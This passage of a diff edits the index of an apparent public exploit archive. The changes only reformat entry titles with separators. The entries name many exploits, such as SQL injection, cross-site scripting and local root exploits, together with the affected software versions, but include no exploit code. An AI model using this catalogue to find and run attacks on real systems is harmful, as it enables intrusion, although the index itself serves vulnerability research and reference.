Escaping",2001-04-23,joetesta,windows,remote,0 @@ -18132,7 +18132,7 @@ id,file,description,date,author,platform,type,port 20825,platforms/windows/remote/20825.txt,"michael lamont savant http server 2.1 - Directory Traversal",2001-02-17,"Tom Tom",windows,remote,0 20826,platforms/windows/remote/20826.txt,"Jason Rahaim MP3Mystic 1.0.x Server Directory Traversal",2001-05-07,neme-dhc,windows,remote,0 20827,platforms/multiple/dos/20827.pl,"Hughes Technologies DSL_Vdns 1.0 - Denial of Service",2001-05-07,neme-dhc,multiple,dos,0 -20828,platforms/windows/dos/20828.txt,"SpyNet 6.5 Chat Server Multiple Connection Denial of Service",2001-05-07,nemesystm,windows,dos,0 +20828,platforms/windows/dos/20828.txt,"SpyNet 6.5 Chat Server - Multiple Connection Denial of Service",2001-05-07,nemesystm,windows,dos,0 20829,platforms/windows/remote/20829.txt,"T. Hauck Jana Server 1.45/1.46 Hex Encoded Directory Traversal",2001-05-07,neme-dhc,windows,remote,0 20830,platforms/windows/dos/20830.txt,"T. Hauck Jana Server 1.45/1.46/2.0 - MS-DOS Device Name DoS",2001-05-07,neme-dhc,windows,dos,0 20831,platforms/cgi/remote/20831.txt,"Drummond Miles A1Stats 1.0 - a1disp2.cgi Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote,0 @@ -18987,7 +18987,7 @@ id,file,description,date,author,platform,type,port 21710,platforms/windows/remote/21710.txt,"MyWebServer 1.0.2 Long HTTP Request HTML Injection",2002-08-14,D4rkGr3y,windows,remote,0 21711,platforms/windows/remote/21711.html,"Microsoft Outlook Express 5/6 MHTML URL Handler File Rendering",2002-08-15,http-equiv,windows,remote,0 21712,platforms/windows/dos/21712.txt,"Google Toolbar 1.1.60 - Search Function Denial of Service",2002-08-15,onet,windows,dos,0 -21713,platforms/windows/local/21713.py,"Exploit: NCMedia Sound Editor Pro 7.5.1 - (SEH + DEP Bypass)",2012-10-03,b33f,windows,local,0 +21713,platforms/windows/local/21713.py,"NCMedia Sound Editor Pro 7.5.1 - (SEH + DEP Bypass)",2012-10-03,b33f,windows,local,0 21715,platforms/php/webapps/21715.txt,"WordPress Plugin spider calendar - Multiple Vulnerabilities",2012-10-03,D4NB4R,php,webapps,0 21716,platforms/php/webapps/21716.txt,"Omnistar Mailer 7.2 - Multiple Vulnerabilities",2012-10-03,Vulnerability-Lab,php,webapps,0 21717,platforms/windows/remote/21717.txt,"Microsoft Windows XP HCP URI Handler Abuse",2002-08-15,"Shane Hird",windows,remote,0 @@ -19002,7 +19002,7 @@ id,file,description,date,author,platform,type,port 21726,platforms/linux/remote/21726.c,"MySQL 3.20.32/3.22.x/3.23.x Null Root Password Weak Default Configuration (2)",2002-10-05,st0ic,linux,remote,0 21727,platforms/php/webapps/21727.txt,"Mantis 0.15.x/0.16/0.17.x JPGraph Remote File Inclusion Command Execution",2002-08-19,"Joao Gouveia",php,webapps,0 21728,platforms/cgi/webapps/21728.txt,"Kerio MailServer 5.0/5.1 Web Mail Multiple Cross-Site Scripting Vulnerabilities",2002-08-19,"Abraham Lincoln",cgi,webapps,0 -21729,platforms/cgi/webapps/21729.txt,"Mozilla Bonsai Multiple Cross-Site Scripting Vulnerabilities",2002-08-20,"Stan Bubrouski",cgi,webapps,0 +21729,platforms/cgi/webapps/21729.txt,"Mozilla Bonsai - Multiple Cross-Site Scripting Vulnerabilities",2002-08-20,"Stan Bubrouski",cgi,webapps,0 21730,platforms/cgi/webapps/21730.txt,"Mozilla Bonsai 1.3 Path Disclosure",2002-08-20,"Stan Bubrouski",cgi,webapps,0 21731,platforms/novell/remote/21731.pl,"Novell NetWare 5.1/6.0 HTTP Post Arbitrary Perl Code Execution",2002-08-20,"Dan Elder",novell,remote,0 21732,platforms/linux/local/21732.txt,"SCPOnly 2.3/2.4 - SSH Environment Shell Escaping",2002-08-20,"Derek D. Martin",linux,local,0 @@ -19252,7 +19252,7 @@ id,file,description,date,author,platform,type,port 21986,platforms/windows/dos/21986.pl,"Windows Media Player 10 - (.avi) Integer Division By Zero Crash PoC",2012-10-15,Dark-Puzzle,windows,dos,0 21988,platforms/windows/local/21988.pl,"Huawei Technologies Internet Mobile - Unicode SEH Exploit",2012-10-15,Dark-Puzzle,windows,local,0 21989,platforms/php/webapps/21989.txt,"Cartweaver 3 - Local File Inclusion",2012-10-15,HaxOr,php,webapps,0 -21990,platforms/php/webapps/21990.txt,"airVisionNVR 1.1.13 readfile() Disclosure and SQL Injection",2012-10-15,pennyGrit,php,webapps,0 +21990,platforms/php/webapps/21990.txt,"airVisionNVR 1.1.13 - readfile() Disclosure / SQL Injection",2012-10-15,pennyGrit,php,webapps,0 21991,platforms/windows/dos/21991.py,"QQPlayer 3.7.892 m2p quartz.dll Heap Pointer Overwrite PoC",2012-10-15,"James Ritchey",windows,dos,0 21992,platforms/hardware/webapps/21992.txt,"BigPond 3G21WB - Multiple Vulnerabilities",2012-10-15,"Roberto Paleari",hardware,webapps,0 21993,platforms/php/remote/21993.rb,"AjaXplorer checkInstall.php Remote Command Execution",2012-10-16,Metasploit,php,remote,0 @@ -19894,7 +19894,7 @@ id,file,description,date,author,platform,type,port 22647,platforms/hardware/dos/22647.txt,"D-Link DI-704P Syslog.HTM Denial of Service",2003-05-26,"Chris R",hardware,dos,0 22648,platforms/unix/remote/22648.txt,"Vignette 4/5 - Cross-Site Scripting",2003-05-26,"Ramon Pinuaga Cascales",unix,remote,0 22649,platforms/multiple/remote/22649.txt,"P-News 1.16 Administrative Account Creation",2003-05-24,"Peter Winter-Smith",multiple,remote,0 -22650,platforms/multiple/dos/22650.py,"BRS WebWeaver 1.0 4 POST and HEAD Denial of Service",2003-05-26,euronymous,multiple,dos,0 +22650,platforms/multiple/dos/22650.py,"BRS WebWeaver 1.0 4 - POST and HEAD Denial of Service",2003-05-26,euronymous,multiple,dos,0 22651,platforms/php/webapps/22651.txt,"PostNuke 0.72x Phoenix Glossary Module SQL Injection",2003-05-26,"Lorenzo Manuel Hernandez Garcia-Hierro",php,webapps,0 22652,platforms/windows/local/22652.py,"Zoner Photo Studio 15 Build 3 (Zps.exe) - Registry Value Parsing Exploit",2012-11-12,"Julien Ahrens",windows,local,0 22653,platforms/windows/dos/22653.py,"Smadav Anti Virus 9.1 Crash PoC",2012-11-12,"Mada R Perdhana",windows,dos,0 @@ -20488,7 +20488,7 @@ id,file,description,date,author,platform,type,port 23259,platforms/php/webapps/23259.txt,"GoldLink 3.0 Cookie SQL Injection",2003-10-18,Weke,php,webapps,0 23260,platforms/php/webapps/23260.sh,"Geeklog 1.3.8 Forgot Password SQL Injection",2003-10-19,"Jouko Pynnonen",php,webapps,0 23261,platforms/php/webapps/23261.txt,"Bytehoard 0.7 File Disclosure",2003-10-20,Ezhilan,php,webapps,0 -23262,platforms/jsp/webapps/23262.txt,"Caucho Resin 2.0/2.1 - Multiple HTML Injection and Cross-Site Scripting Vulnerabilities",2003-10-20,"Donnie Werner",jsp,webapps,0 +23262,platforms/jsp/webapps/23262.txt,"Caucho Resin 2.0/2.1 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2003-10-20,"Donnie Werner",jsp,webapps,0 23263,platforms/multiple/dos/23263.txt,"Opera 7.11/7.20 HREF Malformed Server Name Heap Corruption",2003-10-20,@stake,multiple,dos,0 23264,platforms/php/webapps/23264.txt,"DeskPro 1.1 - Multiple SQL Injection",2003-10-20,"Aviram Jenik",php,webapps,0 23265,platforms/windows/remote/23265.txt,"Sun Java Plugin 1.4.2 _01 - Cross-Site Applet Sandbox Security Model Violation",2003-10-20,"Marc Schoenefeld",windows,remote,0 @@ -21579,7 +21579,7 @@ id,file,description,date,author,platform,type,port 24390,platforms/php/webapps/24390.txt,"Mantis 0.19 - Remote Server-Side Script Execution",2004-08-21,"Jose Antonio",php,webapps,0 24391,platforms/php/webapps/24391.txt,"Mantis 0.x - Multiple Cross-Site Scripting Vulnerabilities",2004-08-21,"Jose Antonio",php,webapps,0 24392,platforms/php/webapps/24392.php,"Mantis 0.x New Account Signup Mass Emailing",2004-08-21,"Jose Antonio",php,webapps,0 -24393,platforms/php/webapps/24393.txt,"MyDms 1.4 - SQL Injection And Directory Traversal",2004-08-21,"Jose Antonio",php,webapps,0 +24393,platforms/php/webapps/24393.txt,"MyDms 1.4 - SQL Injection / Directory Traversal",2004-08-21,"Jose Antonio",php,webapps,0 24394,platforms/multiple/dos/24394.txt,"Opera Web Browser 7.23 JavaScript Denial of Service",2004-08-21,sourvivor,multiple,dos,0 24395,platforms/windows/dos/24395.txt,"Microsoft Internet Explorer 6.0_ Firefox 0.8/0.9.x - JavaScript Denial of Service",2004-08-23,MeFakon,windows,dos,0 24396,platforms/php/webapps/24396.txt,"JShop E-Commerce Suite 3.0 - Page.php Cross-Site Scripting",2004-08-23,"Dr Ponidi Haryanto",php,webapps,0 @@ -21633,7 +21633,7 @@ id,file,description,date,author,platform,type,port 24450,platforms/freebsd/dos/24450.txt,"FreeBSD 9.1 ftpd Remote Denial of Service",2013-02-05,"Maksymilian Arciemowicz",freebsd,dos,0 24451,platforms/php/webapps/24451.txt,"ArrowChat 1.5.61 - Multiple Vulnerabilities",2013-02-05,kallimero,php,webapps,0 24452,platforms/php/webapps/24452.txt,"AdaptCMS 2.0.4 - (config.php question parameter) SQL Injection",2013-02-05,kallimero,php,webapps,0 -24453,platforms/hardware/webapps/24453.txt,"D-Link DIR-600 and DIR-300 - (rev B) Multiple Vulnerabilities",2013-02-05,m-1-k-3,hardware,webapps,0 +24453,platforms/hardware/webapps/24453.txt,"D-Link DIR-600 and DIR-300 (rev B) - Multiple Vulnerabilities",2013-02-05,m-1-k-3,hardware,webapps,0 24454,platforms/php/webapps/24454.txt,"Free Monthly Websites 2.0 - Multiple Vulnerabilities",2013-02-05,X-Cisadane,php,webapps,0 24455,platforms/unix/remote/24455.rb,"Portable UPnP SDK unique_service_name() Remote Code Execution",2013-02-05,Metasploit,unix,remote,0 24456,platforms/php/webapps/24456.txt,"glossword 1.8.12 - Multiple Vulnerabilities",2013-02-05,AkaStep,php,webapps,0 @@ -22120,7 +22120,7 @@ id,file,description,date,author,platform,type,port 24972,platforms/windows/dos/24972.c,"Flightgear 2.0/2.4 - Remote Format String Exploit",2013-04-22,Kurono,windows,dos,0 24973,platforms/php/webapps/24973.txt,"VoipNow 2.5 - Local File Inclusion",2013-04-22,i-Hmx,php,webapps,0 24974,platforms/hardware/remote/24974.rb,"Netgear DGN2200B pppoe.cgi Remote Command Execution",2013-04-22,Metasploit,hardware,remote,0 -24975,platforms/hardware/webapps/24975.txt,"D'Link DIR-615 Hardware rev D3 / DIR-300 - Hardware rev A Multiple Vulnerabilities",2013-04-23,m-1-k-3,hardware,webapps,0 +24975,platforms/hardware/webapps/24975.txt,"D'Link DIR-615 Hardware rev D3 / DIR-300 Hardware rev A - Multiple Vulnerabilities",2013-04-23,m-1-k-3,hardware,webapps,0 24976,platforms/multiple/remote/24976.rb,"Java Applet Reflection Type Confusion Remote Code Execution",2013-04-23,Metasploit,multiple,remote,0 25089,platforms/php/webapps/25089.txt,"PHP-Fusion 4.0 Viewthread.php Information Disclosure",2005-02-08,TheGreatOne2176,php,webapps,0 24979,platforms/multiple/remote/24979.txt,"XLReader 0.9 - Remote Client-Side Buffer Overflow",2004-12-16,"Kris Kubicki",multiple,remote,0 @@ -22344,7 +22344,7 @@ id,file,description,date,author,platform,type,port 25200,platforms/php/webapps/25200.txt,"PHP Arena PAFileDB 3.1 - Multiple Remote Cross-Site Scripting Vulnerabilities",2005-03-08,sp3x@securityreason.com,php,webapps,0 25201,platforms/cgi/webapps/25201.txt,"NewsScript Access Validation",2005-03-08,adrianc23@gmail.com,cgi,webapps,0 25202,platforms/linux/local/25202.c,"Linux Kernel 2.6.x - 'SYS_EPoll_Wait' Local Integer Overflow Local Root (1)",2005-03-09,sd,linux,local,0 -25203,platforms/linux/local/25203.c,"Linux Kernel 2.6.x (RHEL4 <= 2.6.9 / <= 2.6.11) - SYS_EPoll_Wait Local Integer Overflow Local Root (2)",2005-03-09,alert7,linux,local,0 +25203,platforms/linux/local/25203.c,"Linux Kernel 2.6.9 /2.6.11 (RHEL4) - SYS_EPoll_Wait Local Integer Overflow Local Root (2)",2005-03-09,alert7,linux,local,0 25204,platforms/windows/local/25204.py,"ABBS Audio Media Player 3.1 - (.lst) Buffer Overflow",2013-05-04,"Julien Ahrens",windows,local,0 25205,platforms/multiple/remote/25205.txt,"Techland XPand Rally 1.0/1.1 - Remote Format String",2005-03-10,"Luigi Auriemma",multiple,remote,0 25206,platforms/php/webapps/25206.txt,"phpoutsourcing zorum 3.5 - Multiple Vulnerabilities",2005-03-10,benjilenoob,php,webapps,0 @@ -22429,7 +22429,7 @@ id,file,description,date,author,platform,type,port 25286,platforms/php/webapps/25286.txt,"MagicScripts E-Store Kit-2 PayPal Edition Remote File Inclusion",2005-03-26,Dcrab,php,webapps,0 25287,platforms/linux/dos/25287.c,"Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index (Proof of Concept) (1)",2005-03-28,"ilja van sprundel",linux,dos,0 25288,platforms/linux/local/25288.c,"Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index Local Root (2)",2005-04-08,qobaiashi,linux,local,0 -25289,platforms/linux/local/25289.c,"Linux Kernel 2.4.30 / <= 2.6.11.5 - Bluetooth bluez_sock_create Local Root",2005-10-19,backdoored.net,linux,local,0 +25289,platforms/linux/local/25289.c,"Linux Kernel 2.4.30 / 2.6.11.5 - Bluetooth bluez_sock_create Local Root",2005-10-19,backdoored.net,linux,local,0 25291,platforms/multiple/remote/25291.txt,"Tincat Network Library Remote Buffer Overflow",2005-03-28,"Luigi Auriemma",multiple,remote,0 25292,platforms/hardware/webapps/25292.txt,"Cisco Linksys E4200 Firmware - Multiple Vulnerabilities",2013-05-07,sqlhacker,hardware,webapps,0 25775,platforms/linux/remote/25775.rb,"Nginx HTTP Server 1.3.9-1.4.0 - Chuncked Encoding Stack Buffer Overflow",2013-05-28,Metasploit,linux,remote,80 @@ -22626,7 +22626,7 @@ id,file,description,date,author,platform,type,port 25490,platforms/php/webapps/25490.txt,"ProfitCode Software PayProCart 3.0 AdminShop HDoc Cross-Site Scripting",2005-04-21,Lostmon,php,webapps,0 25491,platforms/php/webapps/25491.txt,"ProfitCode Software PayProCart 3.0 AdminShop ModID Cross-Site Scripting",2005-04-21,Lostmon,php,webapps,0 25492,platforms/php/webapps/25492.txt,"ProfitCode Software PayProCart 3.0 AdminShop TaskID Cross-Site Scripting",2004-04-21,Lostmon,php,webapps,0 -25493,platforms/php/webapps/25493.txt,"CKEditor < 4.1 - Persistent XSS WYSIWYG module Drupal 6.x & 7.x",2013-05-17,r0ng,php,webapps,0 +25493,platforms/php/webapps/25493.txt,"CKEditor < 4.1WYSIWYG module Drupal 6.x & 7.x - Persistent XSS",2013-05-17,r0ng,php,webapps,0 25494,platforms/php/webapps/25494.txt,"ProfitCode Software PayProCart 3.0 AdminShop ProMod Cross-Site Scripting",2005-04-21,Lostmon,php,webapps,0 25495,platforms/php/webapps/25495.txt,"ProfitCode Software PayProCart 3.0 AdminShop MMActionComm Cross-Site Scripting",2005-04-21,Lostmon,php,webapps,0 25496,platforms/php/webapps/25496.txt,"php-Charts 1.0 - Code Execution",2013-05-17,"fizzle stick",php,webapps,0 @@ -22721,7 +22721,7 @@ id,file,description,date,author,platform,type,port 25587,platforms/asp/webapps/25587.txt,"MaxWebPortal 1.3 pic_popular.asp SQL Injection",2005-05-02,s-dalili,asp,webapps,0 25588,platforms/asp/webapps/25588.txt,"MaxWebPortal 1.3 dl_toprated.asp SQL Injection",2005-05-02,s-dalili,asp,webapps,0 25589,platforms/asp/webapps/25589.txt,"MaxWebPortal 1.3 custom_link.asp Multiple Parameter SQL Injection",2005-05-02,s-dalili,asp,webapps,0 -25590,platforms/php/webapps/25590.txt,"OSTicket 1.2/1.3 - Multiple Input Validation and Remote Code Injection Vulnerabilities",2005-05-03,"James Bercegay",php,webapps,0 +25590,platforms/php/webapps/25590.txt,"OSTicket 1.2/1.3 - Multiple Input Validation / Remote Code Injection Vulnerabilities",2005-05-03,"James Bercegay",php,webapps,0 25591,platforms/php/webapps/25591.txt,"SitePanel2 2.6.1 - Multiple Input Validation Vulnerabilities",2005-05-03,"James Bercegay",php,webapps,0 25592,platforms/cgi/webapps/25592.txt,"WebCrossing WebX 5.0 - Cross-Site Scripting",2005-05-03,dr_insane,cgi,webapps,0 25593,platforms/php/webapps/25593.txt,"Invision Power Board 2.0.3/2.1 Act Parameter Cross-Site Scripting",2005-05-03,"arron ward",php,webapps,0 @@ -22926,8 +22926,8 @@ id,file,description,date,author,platform,type,port 33424,platforms/php/webapps/33424.txt,"Kasseler CMS 1.3.4 Lite Multiple Cross-Site Scripting Vulnerabilities",2009-12-21,Gamoscu,php,webapps,0 33425,platforms/php/webapps/33425.py,"SPIP - CMS < 3.0.9 / 2.1.22 / 2.0.23 - Privilege Escalation",2014-05-19,"Gregory DRAPERI",php,webapps,80 25777,platforms/php/webapps/25777.txt,"PowerDownload 3.0.2/3.0.3 IncDir Remote File Inclusion",2005-05-31,"SoulBlack Group",php,webapps,0 -25778,platforms/php/webapps/25778.txt,"Calendarix 0.8.20071118 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2005-05-31,DarkBicho,php,webapps,0 -25779,platforms/php/webapps/25779.txt,"MyBB - Multiple Cross-Site Scripting and SQL Injection",2005-05-31,"Alberto Trivero",php,webapps,0 +25778,platforms/php/webapps/25778.txt,"Calendarix 0.8.20071118 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities",2005-05-31,DarkBicho,php,webapps,0 +25779,platforms/php/webapps/25779.txt,"MyBB - Multiple Cross-Site Scripting / SQL Injection",2005-05-31,"Alberto Trivero",php,webapps,0 25780,platforms/asp/webapps/25780.txt,"JiRo's Upload System 1.0 Login.ASP SQL Injection",2005-06-01,Romty,asp,webapps,0 25781,platforms/asp/webapps/25781.txt,"NEXTWEB (i)Site Login.ASP SQL Injection",2005-06-01,"Jim Pangalos",asp,webapps,0 25782,platforms/windows/dos/25782.txt,"HP OpenView Radia 2.0/3.1/4.0 Notify Daemon Multiple Remote Buffer Overflow Vulnerabilities",2005-06-01,"John Cartwright",windows,dos,0 @@ -22940,7 +22940,7 @@ id,file,description,date,author,platform,type,port 25789,platforms/linux/local/25789.c,"FUSE 2.2/2.3 - Local Information Disclosure",2005-06-06,"Miklos Szeredi",linux,local,0 25790,platforms/asp/webapps/25790.txt,"WWWeb Concepts Events System 1.0 LOGIN.ASP SQL Injection",2005-06-06,Romty,asp,webapps,0 25791,platforms/multiple/dos/25791.txt,"Rakkarsoft RakNet 2.33 - Remote Denial of Service",2005-06-06,"Luigi Auriemma",multiple,dos,0 -25792,platforms/php/webapps/25792.txt,"YaPiG 0.9x - Remote and Local File Inclusion",2005-06-06,anonymous,php,webapps,0 +25792,platforms/php/webapps/25792.txt,"YaPiG 0.9x - Remote File Inclusion / Local File Inclusion",2005-06-06,anonymous,php,webapps,0 25793,platforms/php/webapps/25793.txt,"YaPiG 0.9x View.php Cross-Site Scripting",2005-06-06,anonymous,php,webapps,0 25794,platforms/php/webapps/25794.txt,"YaPiG 0.9x Upload.php Directory Traversal",2005-06-06,anonymous,php,webapps,0 25795,platforms/asp/webapps/25795.txt,"Early Impact ProductCart 2.6/2.7 viewPrd.asp idcategory Parameter SQL Injection",2005-06-06,"Dedi Dwianto",asp,webapps,0 @@ -22970,7 +22970,7 @@ id,file,description,date,author,platform,type,port 25829,platforms/php/webapps/25829.txt,"ATutor 1.4.3 send_message.php l Parameter XSS",2005-06-16,Lostmon,php,webapps,0 25830,platforms/php/webapps/25830.txt,"ATutor 1.4.3 - search.php Multiple Parameter XSS",2005-06-16,Lostmon,php,webapps,0 25831,platforms/php/webapps/25831.txt,"ATutor 1.4.3 inbox/index.php view Parameter XSS",2005-06-16,Lostmon,php,webapps,0 -25832,platforms/php/webapps/25832.txt,"ATutor 1.4.3 tile.php Multiple Parameter XSS",2005-06-16,Lostmon,php,webapps,0 +25832,platforms/php/webapps/25832.txt,"ATutor 1.4.3 - tile.php Multiple Parameter XSS",2005-06-16,Lostmon,php,webapps,0 25833,platforms/php/webapps/25833.txt,"ATutor 1.4.3 subscribe_forum.php us Parameter XSS",2005-06-16,Lostmon,php,webapps,0 25834,platforms/php/webapps/25834.txt,"ATutor 1.4.3 - directory.php Multiple Parameter XSS",2005-06-16,Lostmon,php,webapps,0 25835,platforms/windows/remote/25835.html,"Logic Print 2013 - Stack Overflow (vTable Overwrite)",2013-05-30,h1ch4m,windows,remote,0 @@ -23017,27 +23017,27 @@ id,file,description,date,author,platform,type,port 25873,platforms/asp/webapps/25873.txt,"DUware DUclassmate 1.x edit.asp iPro Parameter SQL Injection",2005-06-01,"Dedi Dwianto",asp,webapps,0 25874,platforms/asp/webapps/25874.txt,"Ipswitch WhatsUp Professional 2005 SP1 LOGIN.ASP SQL Injection",2005-06-22,anonymous,asp,webapps,0 25875,platforms/php/webapps/25875.txt,"Whois.Cart 2.2.x Profile.php Cross-Site Scripting",2005-06-23,"Elzar Stuffenbach",php,webapps,0 -25876,platforms/php/webapps/25876.txt,"CarLine Forum Russian Board 4.2 menu_footer.php Multiple Parameter XSS",2005-06-23,1dt.w0lf,php,webapps,0 +25876,platforms/php/webapps/25876.txt,"CarLine Forum Russian Board 4.2 - menu_footer.php Multiple Parameter XSS",2005-06-23,1dt.w0lf,php,webapps,0 25877,platforms/php/webapps/25877.txt,"CarLine Forum Russian Board 4.2 IMG Tag XSS",2005-06-23,1dt.w0lf,php,webapps,0 -25878,platforms/php/webapps/25878.txt,"CarLine Forum Russian Board 4.2 menu_header.php Multiple Parameter XSS",2005-06-23,1dt.w0lf,php,webapps,0 -25879,platforms/php/webapps/25879.txt,"CarLine Forum Russian Board 4.2 menu_tema.php Multiple Parameter XSS",2005-06-23,1dt.w0lf,php,webapps,0 +25878,platforms/php/webapps/25878.txt,"CarLine Forum Russian Board 4.2 - menu_header.php Multiple Parameter XSS",2005-06-23,1dt.w0lf,php,webapps,0 +25879,platforms/php/webapps/25879.txt,"CarLine Forum Russian Board 4.2 - menu_tema.php Multiple Parameter XSS",2005-06-23,1dt.w0lf,php,webapps,0 25880,platforms/php/webapps/25880.txt,"CarLine Forum Russian Board 4.2 - search.php text_poisk Parameter XSS",2005-06-23,1dt.w0lf,php,webapps,0 25881,platforms/php/webapps/25881.txt,"CarLine Forum Russian Board 4.2 - set.php name_ig_array[] Parameter XSS",2005-06-23,1dt.w0lf,php,webapps,0 -25882,platforms/php/webapps/25882.txt,"CarLine Forum Russian Board 4.2 reply.php Multiple Parameter XSS",2005-06-23,1dt.w0lf,php,webapps,0 +25882,platforms/php/webapps/25882.txt,"CarLine Forum Russian Board 4.2 - reply.php Multiple Parameter XSS",2005-06-23,1dt.w0lf,php,webapps,0 25883,platforms/windows/local/25883.txt,"BOINC Manager (Seti@home) 7.0.64 Field SEH based BOF",2013-06-02,xis_one,windows,local,0 26288,platforms/linux/remote/26288.txt,"Mozilla Browser/Firefox - Arbitrary Command Execution",2005-09-20,"eter Zelezny",linux,remote,0 -25884,platforms/php/webapps/25884.txt,"CarLine Forum Russian Board 4.2 new.php Multiple Parameter XSS",2005-06-23,1dt.w0lf,php,webapps,0 -25885,platforms/php/webapps/25885.txt,"CarLine Forum Russian Board 4.2 edit_msg.php Multiple Parameter XSS",2005-06-23,1dt.w0lf,php,webapps,0 +25884,platforms/php/webapps/25884.txt,"CarLine Forum Russian Board 4.2 - new.php Multiple Parameter XSS",2005-06-23,1dt.w0lf,php,webapps,0 +25885,platforms/php/webapps/25885.txt,"CarLine Forum Russian Board 4.2 - edit_msg.php Multiple Parameter XSS",2005-06-23,1dt.w0lf,php,webapps,0 25886,platforms/php/webapps/25886.txt,"CarLine Forum Russian Board 4.2 menu_header.php table_sql Parameter SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 25887,platforms/php/webapps/25887.txt,"CarLine Forum Russian Board 4.2 - set.php name_ig_array[1] Parameter SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 -25888,platforms/php/webapps/25888.txt,"CarLine Forum Russian Board 4.2 reply_in.php Multiple Parameter SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 +25888,platforms/php/webapps/25888.txt,"CarLine Forum Russian Board 4.2 - reply_in.php Multiple Parameter SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 25889,platforms/php/webapps/25889.txt,"CarLine Forum Russian Board 4.2 - reply.php name_ig_array1[1] Parameter SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 25890,platforms/php/webapps/25890.txt,"CarLine Forum Russian Board 4.2 - new.php name_ig_array1[1] Parameter SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 25891,platforms/php/webapps/25891.txt,"CarLine Forum Russian Board 4.2 - edit_msg.php name_ig_array1[1] Parameter SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 -25892,platforms/php/webapps/25892.txt,"CarLine Forum Russian Board 4.2 memory.php Multiple Parameter SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 -25893,platforms/php/webapps/25893.txt,"CarLine Forum Russian Board 4.2 line.php Multiple Parameter SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 -25894,platforms/php/webapps/25894.txt,"CarLine Forum Russian Board 4.2 in.php Multiple Parameter SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 -25895,platforms/php/webapps/25895.txt,"CarLine Forum Russian Board 4.2 enter.php Multiple Parameter SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 +25892,platforms/php/webapps/25892.txt,"CarLine Forum Russian Board 4.2 - memory.php Multiple Parameter SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 +25893,platforms/php/webapps/25893.txt,"CarLine Forum Russian Board 4.2 - line.php Multiple Parameter SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 +25894,platforms/php/webapps/25894.txt,"CarLine Forum Russian Board 4.2 - in.php Multiple Parameter SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 +25895,platforms/php/webapps/25895.txt,"CarLine Forum Russian Board 4.2 - enter.php Multiple Parameter SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 25896,platforms/solaris/local/25896.pl,"Sun Solaris 10 Traceroute Multiple Local Buffer Overflow Vulnerabilities",2005-06-24,"Przemyslaw Frasunek",solaris,local,0 25897,platforms/php/webapps/25897.txt,"UBBCentral UBB.threads 5.5.1/6.x download.php Number Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 25898,platforms/php/webapps/25898.txt,"UBBCentral UBB.threads 5.5.1/6.x calendar.php Multiple Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 @@ -23048,7 +23048,7 @@ id,file,description,date,author,platform,type,port 25903,platforms/php/webapps/25903.txt,"UBBCentral UBB.threads 5.5.1/6.x grabnext.php posted Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 25904,platforms/php/webapps/25904.c,"K-COLLECT CSV_DB.CGI 1.0/i_DB.CGI 1.0 - Remote Command Execution",2005-06-24,blahplok,php,webapps,0 25905,platforms/asp/webapps/25905.txt,"ASPNuke 0.80 forgot_password.asp email Parameter XSS",2005-06-27,"Alberto Trivero",asp,webapps,0 -25906,platforms/asp/webapps/25906.txt,"ASPNuke 0.80 register.asp Multiple Parameter XSS",2005-06-27,"Alberto Trivero",asp,webapps,0 +25906,platforms/asp/webapps/25906.txt,"ASPNuke 0.80 - register.asp Multiple Parameter XSS",2005-06-27,"Alberto Trivero",asp,webapps,0 25907,platforms/asp/webapps/25907.txt,"ASPNuke 0.80 Language_Select.ASP HTTP Response Splitting",2005-06-27,"Alberto Trivero",asp,webapps,0 25908,platforms/asp/webapps/25908.txt,"ASPPlayground.NET 3.2 SR1 - Remote Arbitrary File Upload",2005-06-27,Psycho,asp,webapps,0 25909,platforms/php/webapps/25909.txt,"Mensajeitor 1.8.9 IP Parameter HTML Injection",2005-06-27,Megabyte,php,webapps,0 @@ -23974,8 +23974,8 @@ id,file,description,date,author,platform,type,port 26855,platforms/php/webapps/26855.txt,"IHTML Merchant Mall SQL Injection",2005-12-16,r0t3d3Vil,php,webapps,0 26856,platforms/php/webapps/26856.txt,"IHTML Merchant 2.0 - SQL Injection",2005-12-16,r0t3d3Vil,php,webapps,0 26857,platforms/php/webapps/26857.txt,"PHP Arena PAFileDB Extreme Edition SQL Injection",2005-12-16,r0t3d3Vil,php,webapps,0 -26858,platforms/cgi/webapps/26858.txt,"Binary Board System 0.2.5 reply.pl Multiple Parameter XSS",2005-12-16,r0t3d3Vil,cgi,webapps,0 -26859,platforms/cgi/webapps/26859.txt,"Binary Board System 0.2.5 stats.pl Multiple Parameter XSS",2005-12-16,r0t3d3Vil,cgi,webapps,0 +26858,platforms/cgi/webapps/26858.txt,"Binary Board System 0.2.5 - reply.pl Multiple Parameter XSS",2005-12-16,r0t3d3Vil,cgi,webapps,0 +26859,platforms/cgi/webapps/26859.txt,"Binary Board System 0.2.5 - stats.pl Multiple Parameter XSS",2005-12-16,r0t3d3Vil,cgi,webapps,0 26860,platforms/cgi/webapps/26860.txt,"Binary Board System 0.2.5 toc.pl board Parameter XSS",2005-12-16,r0t3d3Vil,cgi,webapps,0 26861,platforms/cgi/webapps/26861.txt,"ScareCrow 2.13 forum.cgi forum Parameter XSS",2005-12-16,r0t3d3Vil,cgi,webapps,0 26862,platforms/cgi/webapps/26862.txt,"ScareCrow 2.13 profile.cgi user Parameter XSS",2005-12-16,r0t3d3Vil,cgi,webapps,0 @@ -24265,7 +24265,7 @@ id,file,description,date,author,platform,type,port 